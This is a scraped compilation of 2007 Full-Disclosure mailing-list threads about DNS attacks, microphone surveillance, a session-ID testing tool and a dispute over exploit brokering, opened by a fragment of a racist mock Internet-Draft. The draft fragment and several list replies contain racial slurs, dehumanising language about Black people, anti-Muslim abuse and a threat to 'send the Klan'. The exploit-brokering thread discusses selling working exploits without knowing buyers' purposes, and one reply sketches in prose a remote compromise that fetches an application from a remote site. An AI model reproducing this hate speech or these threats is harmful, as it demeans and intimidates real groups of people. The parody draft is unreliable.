. . . . . . . . . . . . . . . . . . . . . ancho 3.2. NAT Traversal . . . . . . . . . . . . . . . . . . . . . ancho 4. Security Considerations . . . . . . . . . . . . . . . . . . ancho 5. Normative References . . . . . . . . . . . . . . . . . . . ancho Author's Address . . . . . . . . . . . . . . . . . . . . . . . 0 Evers Expires May 5, 2007 [Page 2] Internet-Draft DarkNet November 2006 1. Background Since nearly the discovery of the dark-skinned Negroid race [Negro], the white man has found this race to be incalculably useful in many commercial endeavors from cotton picking to producing hip and urban music. It has come to the attention of the Authors that the time may be ripe to introduce a viable new system of transmitting Internet Protocol Datagrams using this hardy and industrious race of dark-skinned commodity. Evers Expires May 5, 2007 [Page 3] Internet-Draft DarkNet November 2006 2. Frame Encoding and Transmission Sending a Datagram using a Negro is a complicated business, and it may place considerable strain on systems not accustomed to dealing with large amounts of Negroes, particularly at institutions of higher education, polite society and Libraries. There are multiple steps which must be taken to encode and prepare the Datagram for transmission, which are as follows. 2.1. Encryption and Encapsulation Firstly, to prepare the IP Datagram for transmission, it must be encoded so as to provide end-to-end encryption of the contents of the data. To encode the datagram, simply have it bound into a story- book. This simple transformation will leave the Negro clueless as to its contents, and it will be disinclined to scan its pages as Negroes
Re: [Full-disclosure] AP report: Hackers attack key Net traffic computers
Amen! On 2/6/07 9:56 PM, James Matthews [EMAIL PROTECTED] wrote: Yes they hit the .org servers! Maybe this is a little wake up call for all the people that don't put money into computer security! On 2/6/07, Juha-Matti Laurio [EMAIL PROTECTED] wrote: According to http://seattlepi.nwsource.com/business/1700AP_Internet_Attacks.html Experts said the unusually powerful attacks lasted for hours but passed largely unnoticed by most computer users, a testament to the resiliency of the Internet. Public CERT sources are pointing to this TEAM CYMRU's DNS Name Server Status Summary page too: http://www.cymru.com/monitoring/dnssumm/index.html http://www.cymru.com/monitoring/dnssumm/index.html - Juha-Matti ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
You're still a coward. On 1/30/07 12:31 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Please stay on topic. Your trolling and bad attempts at humor do not belong on this list. We are all professionals here. Need I cite the list charter? NIGGERS On Mon, 29 Jan 2007 23:29:26 -0500 Simon Smith [EMAIL PROTECTED] wrote: Who's paranoid, I'm not paranoid, stop talking about me! On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote: On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p ;-) Paranoia is a good characteristic to have. Here's a few references: http://www.google.com/search?hl=enq=FBI+Mob+microphone -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkW/gPIACgkQgSMOKd40iZjszAQAlTSDZh/2B3ld73tuEjdoVw7Qz55u a2/uy6/olm5ZYzi4RGgIG8emWlTF2eqnTFlKegvtCTQ+jfG5G44egLg419lnULrVTepc OQwscLJBbSiBgwGTdKMlf+x5Hvz+ltmahvHYcMfZuzPkmyNa/cfcZr7+gbSJZVqEBXpp erpYD54= =AHsY -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
Idiot. ;] On 1/30/07 1:04 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 YOU AREN'T EVEN AN AMERICAN MUSLIM TERRORISTS LIKE YOU ARE RESPONSIBLE FOR KILLING A YOUNG MAN ON THIS LIST AT LEAST YOUR KURAN COMES IN TWO-PLY NOW FUCK YOU TERRORIST I WILL SEND THE KLAN AFTER YOU GET OUT OF MY COUNTRY BUT CRASH A PLANE INTO SIMON FIRST THANKS On Tue, 30 Jan 2007 12:58:06 -0500 [EMAIL PROTECTED] wrote: Fuck you facist piece of shit. I hate motherfuckers who hide behind hushmail to be bigot racist pieces of shit. Yet you have nothing contributed to the list ass wipe! On Tuesday, January 30, 2007 11:30 AM, [EMAIL PROTECTED] wrote: Date: Tue, 30 Jan 2007 12:30:38 -0500 From: [EMAIL PROTECTED] To: Simon Smith [EMAIL PROTECTED] Subject: Re: [Full-disclosure] PC/Laptop microphones -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Sounds very technical. Very advanced analysis, and very good advice. I assume that this could possibly theoretically effect some legacy cellphones too, maybe, I think... likely or not? You tell me. oh shit i need to get back in character. NIGGERS On Mon, 29 Jan 2007 22:02:14 -0500 Simon Smith [EMAIL PROTECTED] wrote: Jim, In all reality you don't have to be an agent to do this. You could just write an exploit that when successfully executed would compromise the target and then fetch an application from a remote site. I'm sure that things like this have been done in the past. Hell imagine what you could do with a web cam! ;] New telephones are no different I'm sure. On 1/29/07 9:26 PM, Jim Popovitch [EMAIL PROTECTED] wrote: I started this discussion elsewhere, but I feel that there is more experience and concern here. When I look at BIOS settings I see config options to disable sound cards, USB, CDROM, INTs, etc., but what about the PC or laptop microphone? Does disabling the sound card remove the availability of a built-in microphone? What if I want to play mp3s but never have the need to use a microphone? Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), what prevents my OS provider (or distribution) and ISP from working on a way to listen in on my office or home conversations via the microphone or the built-in speakers? Thoughts? -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkW/gL4ACgkQgSMOKd40iZjHjAP/dQT6SyG0ecFnyoUIv6LJG5pAHN 3K 5uLZo5pqTW9oOsyQAosU7wYvCHh5QnYSvCMud7r8I7V6tRABbDqSiw4eg8X43fZ7/r 0o FhqkbKfAdsaGJjT+ybVNISyXqjHbYx6UV1JVWXKC8ofYdsGjwcw3lNNsUDxudHWT69 Hw MS/FK1k= =Gso2 -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds - Einstein Cuanta estupidez en tan poco cerebro! -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkW/iL0ACgkQgSMOKd40iZgM3QP8CWxhPqL0wMlCHuYkak1GHTsZCLKS mX0HdNZh7Xql3N2HSYGXshuKBYNu3DqX52FI4GLkbKDQxVT4q9G4vd4g+kLrODOii03z Cvo4Sg3XeQkqWRe5/1e31MGJsccLxvC+k2/+GFqKMLu61M0ovg4umOsiO3jH1eHX3l0o 0aOF3lc= =xCxH -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
Jim, In all reality you don't have to be an agent to do this. You could just write an exploit that when successfully executed would compromise the target and then fetch an application from a remote site. I'm sure that things like this have been done in the past. Hell imagine what you could do with a web cam! ;] New telephones are no different I'm sure. On 1/29/07 9:26 PM, Jim Popovitch [EMAIL PROTECTED] wrote: I started this discussion elsewhere, but I feel that there is more experience and concern here. When I look at BIOS settings I see config options to disable sound cards, USB, CDROM, INTs, etc., but what about the PC or laptop microphone? Does disabling the sound card remove the availability of a built-in microphone? What if I want to play mp3s but never have the need to use a microphone? Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), what prevents my OS provider (or distribution) and ISP from working on a way to listen in on my office or home conversations via the microphone or the built-in speakers? Thoughts? -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PC/Laptop microphones
Who's paranoid, I'm not paranoid, stop talking about me! On 1/29/07 11:13 PM, Jim Popovitch [EMAIL PROTECTED] wrote: On Tue, 2007-01-30 at 03:52 +0100, Tyop? wrote: On 1/30/07, Jim Popovitch [EMAIL PROTECTED] wrote: Given recent info about the US FBIs capabilities to remotely enable mobile phone microphones (presumably via corporate cellular service providers), Do you have some links on that? Paranoia inside :p ;-) Paranoia is a good characteristic to have. Here's a few references: http://www.google.com/search?hl=enq=FBI+Mob+microphone -Jim P. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] stompy the session stomper - tool availability
Very cool. On 1/27/07 7:29 AM, Michal Zalewski [EMAIL PROTECTED] wrote: Hi all, I'd like to announce the availability of 'stompy', a free tool to perform a fairly detailed black-box assessment of WWW session identifier generation algorithms. Session IDs are commonly used to track authenticated users, and as such, whenever they're predictable or simply vulnerable to brute-force attacks, we do have a problem. [ The reason I'm cc:ing BUGTRAQ is that this tool already revealed several new, potential weaknesses in application platforms, and can be readily used to find more - for example, it is my impression that BEA WebLogic and Sun Java System Web Server both have problems with their JSESSIONIDs [1]; proprietary solutions by some of the larger portals / e-commerce sites didn't always earn a passing grade, either. ] Why bother? === Some session ID cookie generation mechanisms are well-studied and well-documented, and believed to be cryptographically secure (example: Apache Tomcat, PHP, ASP.NET builtins). This is not necessarily so for certain less researched enterprise web platforms - and almost never so for custom solutions that are frequently implemented inside the web application itself. Yet, while there are several nice GUI-based tools designed to analyze HTTP cookies for common problems (Daves' WebScarab, SPI Cookie Cruncher, Foundstone CookieDigger, etc), they all seem to rely on very trivial, if any, tests when it comes to unpredictability (alphabet distribution or average bits changed are top shelf); this functionality is often not better than a quick pen-and-paper analysis, and can't be routinely used to tell a highly vulnerable linear congruent PRNG (rand()) from a well-implemented MD5 hash system (/dev/urandom). As far as I can tell, today's super-bored pen-testers can at best collect data by hand, determine its encoding, write conversion scripts, and then feed it to NIST Statistical Test Suide or alike - but few will. What's cool? In order to have a fully automated, hands-off tool to reliably detect anomalies that are not readily apparent at a first glance, I devised an utility that: - Automatically finds session IDs encoded as URLs, cookies, and in form inputs, then collects a statistically significant sample of data, - Determines alphabet structure to transparently handle base64, uuencode, base32, hex, and any other sane encoding scheme without user intervention, - Translates the data to isolated time-domain bitstreams to examine how SID bits at each position change in time, - Runs a suite of FIPS-140-2 PRNG evaluation tests on the sample, - Runs an array of n-dimensional phase space tests to find deterministic correlations, PRNG hyperplanes, etc, etc. Of course, the tool cannot prove the correctness of an implementation, and it is possible to devise predictable, cryptographically unsafe PRNGs that would pass these tests; still, the tool can find plenty of problems and oddities. Well, that's it. For more, see the included README file. The application, in a fairly decent shape (not a wobbly PoC) and tested under Linux, FreeBSD, and CYGWIN, can be downloaded here: http://lcamtuf.coredump.cx/stompy.tgz Cheers, /mz [1] BEA Weblogic test output: http://lcamtuf.coredump.cx/BEA.log; in response to WebScarab analysis, BEA stated some time ago that the beginning of the identifier might be deterministic at MSB positions: http://dev2dev.bea.com/blog/neilsmithline/archive/2006/03/jsessionid_valu_1.ht ml ...but 'stompy' output seems to clearly indicate that all the data exhibits strong biases, irregularities, and correlation patterns, and as such, the randomness of their very large random number is questionable at best. . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Mario, What Netragard is doing is in fact not nearly as naive as what you are proposing. In fact, what Netragard is doing will most probably help ³alarm companies² in the future. On 1/20/07 7:10 AM, Mario D [EMAIL PROTECTED] wrote: So, Let's say I know how to bypass the alarm to your house. Should I put it up for sale and not worry about who buys it or why because it is none of my business? Its people like you who give the security profession a bad name. Mario - Original Message From: Simon Smith [EMAIL PROTECTED] To: Roman Medina-Heigl Hernandez [EMAIL PROTECTED]; Untitled full-disclosure@lists.grok.org.uk Cc: bugtraq@securityfocus.com Sent: Thursday, January 18, 2007 2:27:06 PM Subject: Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Everyone is raving about the all-new Yahoo! Mail beta. http://us.rd.yahoo.com/evt=45083/*http://advision.webevents.yahoo.com/mailbet a ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Roman, It depends on the needs and requirements of the buyer. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Just wanted to let everyone know that I've updated the blog to reflect new changes. You can see the changes at http://snosoft.blogspot.com. On 1/18/07 2:27 PM, Simon Smith [EMAIL PROTECTED] wrote: Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Nobody ever said that 75,000.00 was a price for a remote vista bug. On 1/18/07 8:39 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: This is complete bullshit nothing more than a social engineering honey pot to get bugs and vulns for their own use, this company couldn't affort 75.ooo USD if they tried, they cannot even find their own bugs, they got 4 or 5 shitty reasearch and vuln findings of thier own, that's it. 75.000 for a remote vista ie7 xploit, guaranteed you wont find it and if you do they won't pay lose lose :( jigga yo Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Sure he did ivan... On 1/19/07 12:53 AM, Ivan . [EMAIL PROTECTED] wrote: 75.000 for a remote vista ie7 xploit, ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Roman and List, Let me address this issue once and for all, because the issue is really quite simple. I am offering security researchers the ability to have their exploits legally purchased for a price that is higher than the standard prices offered by the majority of third parties. The researchers who decide to participate will be sent a legally binding contract. This contract will specifically protect the researcher and buyer and clearly spell out the terms and conditions of business. And as for Roman's argument, I can assure him (and all of you) that the exploit code will be put to ethical, legitimate and legal use. The only people that will be using the exploit code are established U.S. based public or private sector corporations/parties. Other than that I am not going to get into a debate about it. Lastly, it amazes me that so many people complain about the prices that they sell their exploits for, then, when someone like me comes around to try to give them fair pricing in a legal way, they'd rather complain about that than take up the opportunity. This reminds me of old women who are always trying to find a reason to complain. Nothing more than a bunch of grumpy old women. ;] On 1/18/07 7:53 PM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Then you cannot assure that your buyer will make an ethical use of the exploit. So what's the real difference against selling it to another people (known or unknown, where unknown could be black-hats, script-kiddies or whoever making the higher bid)? The receipt? :) I mean, if I (as a researcher) don't mind what the exploit will be used for, I'd simply look for the higher bidder (I guess). And you didn't really answer my former two questions... Please, could you provide some specific examples of typical ways to justify ROI? Which is the typical profile/s of enterprise/s buying exploits? (without naming particular enterprises, of course). Simon Smith escribió: Oh, About your ROI question, that varies per buyer. I am not usually told about why a buyer needs something as that's none of my business. On 1/18/07 4:22 AM, Roman Medina-Heigl Hernandez [EMAIL PROTECTED] wrote: Simon Smith escribió: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're naive I was wondering which kind of (legal) enterprises/organizations would pay $75000 for a simple (or not so simple) exploit. - governmental organizations (defense? DoD? FBI? ...) - firms offering high-profiled pen-testing services? - ... ? What about the ROI for such investment? /naive Regards, -Roman ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Dear NoBalls, What specifically is a fuckface anyway and why are you hiding behind an anonymous email account? More importantly, my words were not: SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up to 75 for the same. Hell that sentence doesn't even make any sense! What the heck does much for up to 75 for the same even mean? My EXACT words were: Amen! KF is 100% on the money. I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. The company that I am working with has a relationship with a legitimate buyer, all transactions are legal. If you're interested contact me and we'll get the ball rolling. -Simon $8000.00 USD is low! -End of my words- ;] On 1/19/07 1:05 AM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for up to 75 for the same. YOUR WORDS FUCKFACE ST00PID LYING CUNT! I can arrange the legitimate purchase of most working exploits for significantly more money than iDefense, In some cases over $75,000.00 per purchase. Re: [Full-disclosure] iDefense Q-1 2007 Challenge From: Simon Smith (simonsnosoft.com) Date: Tue Jan 16 2007 - 11:14:56 CST know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor Contributoridefense.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerabi lity+chall enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith [EMAIL PROTECTED] wrote: Nobody ever said that 75,000.00 was a price for a remote vista bug. On 1/18/07 8:39 PM, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: This is complete bullshit nothing more than a social engineering honey pot to get bugs and vulns for their own use, this company couldn't affort 75.ooo USD if they tried, they cannot even find their own bugs, they got 4 or 5 shitty reasearch and vuln findings of thier own, that's it. 75.000 for a remote vista ie7 xploit, guaranteed you wont find it and if you do they won't pay lose lose :( jigga yo Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge -I WILL BUY FOR MORE
Dumbass, you must be a part of the n3td3v ccr3w or something.
How did you go from 75,000 to 750,000?
On 1/19/07 1:38 AM, [EMAIL PROTECTED] [EMAIL PROTECTED]
wrote:
Number one:
1. An affidavit from your soliciters or accountant's that
USD750.000 has ever been dispensed through your company or your
proxy company
2. An affidavit from your solictier's or accounttants, that you,
your so-called client (who is you sno shit) have ever paid out
upto 750.ooo usd {citing in some cases}
PUT UP SHUT UP OR FUCK OFF. YOU COULDN'T FIND A VULN IF YOU TRIED.
PROOF EVERY ONE WRONG LOUD MOUTH.
On Fri, 19 Jan 2007 01:31:51 -0500 Simon Smith [EMAIL PROTECTED]
wrote:
Dear NoBalls,
What specifically is a fuckface anyway and why are you
hiding behind
an anonymous email account?
More importantly, my words were not:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
up
to 75 for the same.
Hell that sentence doesn't even make any sense! What the heck does
much for
up to 75 for the same even mean?
My EXACT words were:
Amen!
KF is 100% on the money. I can arrange the legitimate purchase
of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase. The company that I am working with
has a
relationship with a legitimate buyer, all transactions are legal.
If you're
interested contact me and we'll get the ball rolling.
-Simon
$8000.00 USD is low!
-End of my words-
;]
On 1/19/07 1:05 AM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
SAME TARGETS: ie7 VISTA 8k, I know someone who will pay much for
up
to 75 for the same. YOUR WORDS FUCKFACE
ST00PID LYING CUNT!
I can arrange the legitimate purchase of most
working exploits for significantly more money than iDefense, In
some cases
over $75,000.00 per purchase.
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
From: Simon Smith (simonsnosoft.com)
Date: Tue Jan 16 2007 - 11:14:56 CST
know someone who will pay significantly more per vulnerability
against the
same targets.
On 1/10/07 12:27 PM, contributor Contributoridefense.com
wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Also available at:
http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerab
i
lity+chall
enge
*Challenge Focus: Remote Arbitrary Code Execution
Vulnerabilities
in
Vista IE 7.0*
On Fri, 19 Jan 2007 00:43:50 -0500 Simon Smith
[EMAIL PROTECTED]
wrote:
Nobody ever said that 75,000.00 was a price for a remote vista
bug.
On 1/18/07 8:39 PM, [EMAIL PROTECTED]
[EMAIL PROTECTED]
wrote:
This is complete bullshit nothing more than a social
engineering
honey pot to get bugs and vulns for their own use, this
company
couldn't affort 75.ooo USD if they tried, they cannot even
find
their own bugs, they got 4 or 5 shitty reasearch and vuln
findings of thier own, that's it.
75.000 for a remote vista ie7 xploit, guaranteed you wont find
it
and if you do they won't pay
lose lose :(
jigga
yo
Concerned about your privacy? Instantly send FREE secure
email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email,
no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480
Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
